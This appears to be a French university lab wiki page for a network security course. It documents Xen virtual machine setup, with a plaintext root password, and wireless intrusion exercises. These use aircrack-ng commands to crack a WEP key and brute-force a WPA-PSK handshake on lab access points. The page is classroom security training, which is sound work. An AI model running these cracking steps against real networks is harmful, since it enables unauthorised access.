TP sysres IMA5 2021/2022 G4 : Différence entre versions
(→5.3 Cassage de mot de passe WPA-PSK par force brute) |
(→Machine Virtuelle) |
||
Ligne 96 : | Ligne 96 : | ||
root@capbreton:~# xen console Karmeliet | root@capbreton:~# xen console Karmeliet | ||
+ | |||
+ | |||
+ | ==Connexion ssh== | ||
= Tests d'intrusions = | = Tests d'intrusions = |
Version du 29 novembre 2021 à 16:22
Sommaire
Cablage Réseau
Machine Virtuelle
Création de la machine virtuelle
Commande pour la création de la machine virtuelle:
root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).
root@capbreton:~# vgdisplay --- Volume group --- VG Name storage System ID Format lvm2 Metadata Areas 2 Metadata Sequence No 152 VG Access read/write VG Status resizable MAX LV 0 Cur LV 26 Open LV 16 Max PV 0 Cur PV 2 Act PV 2 VG Size <5.46 TiB PE Size 4.00 MiB Total PE 1430526 Alloc PE / Size 50176 / 196.00 GiB Free PE / Size 1380350 / <5.27 TiB VG UUID eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc
root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage
Il est nécessaire de les formater au format ext4 :
root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2). Il est, également, nécessaire d'indiquer le bridge IMA5sc.
root@capbreton:~$ vim /etc/xen/Karmeliet.cfg #Disk device(s). # root = '/dev/xvda2 ro' disk = [ 'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w', 'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w', 'phy:/dev/storage/Karmeliet1,xvda3,w', 'phy:/dev/storage/Karmeliet2,xvda4,w' ] #Networking # vif = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]
On lance la machine virtuelle :
root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg
On doit créer xvda3 et xvda4 pour nos répertoires var et home:
root@Karmeliet:~$ mkdir /mnt/xvda3 root@Karmeliet:~$ mkdir /mnt/xvda4 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4
Le répertoire var doit être placé dans le disque xvda4 :
root@Karmeliet:~$ mv /var/* /mnt/xvda4
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:
root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2
La commande suivant permet de monter les disques :
root@Karmeliet:~$ mount -a
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :
root@Karmeliet:~$ lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT xvda1 202:1 0 512M 0 disk [SWAP] xvda2 202:2 0 4G 0 disk / xvda3 202:3 0 10G 0 disk /home xvda4 202:4 0 10G 0 disk /var
Pour accéder à notre VM :
root@capbreton:~# xen console Karmeliet
Connexion ssh
Tests d'intrusions
5.2 Cassage de clef WEP d’un point d’accès WiFi
Cette commande sert à récupérer le nom de l'interface réseau:
airmon-ng
Notre interface réseau s'appelle "wlan0mon" (renommé automatiquement parce que celui de base était trop long)
On démarre l'interface sur le channel 3 :
airmon-ng start wlan0mon 3
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP
airodump-ng wlan0mon
On réalise un test d'injection sur cracotte10
aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon
On récupère les VI générés par le point d'accès pour les stocker dans output :
airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon
On effectue de fausses authentifications
aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon
La clef WEP est alors décriptable :
aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap
Le résultat obtenu est le suivant :
KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] Decrypted correctly: 100%
5.3 Cassage de mot de passe WPA-PSK par force brute
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:
airmon-ng
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:
airmon-ng start wlan0mon 4
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID:
airodump-ng wlan0mon
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle "handshake" et on le sauvegarde dans un fichier sauv:
airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon
On peut commencer le crackage:
aircrack-ng sauv-01.cap -w dico.txt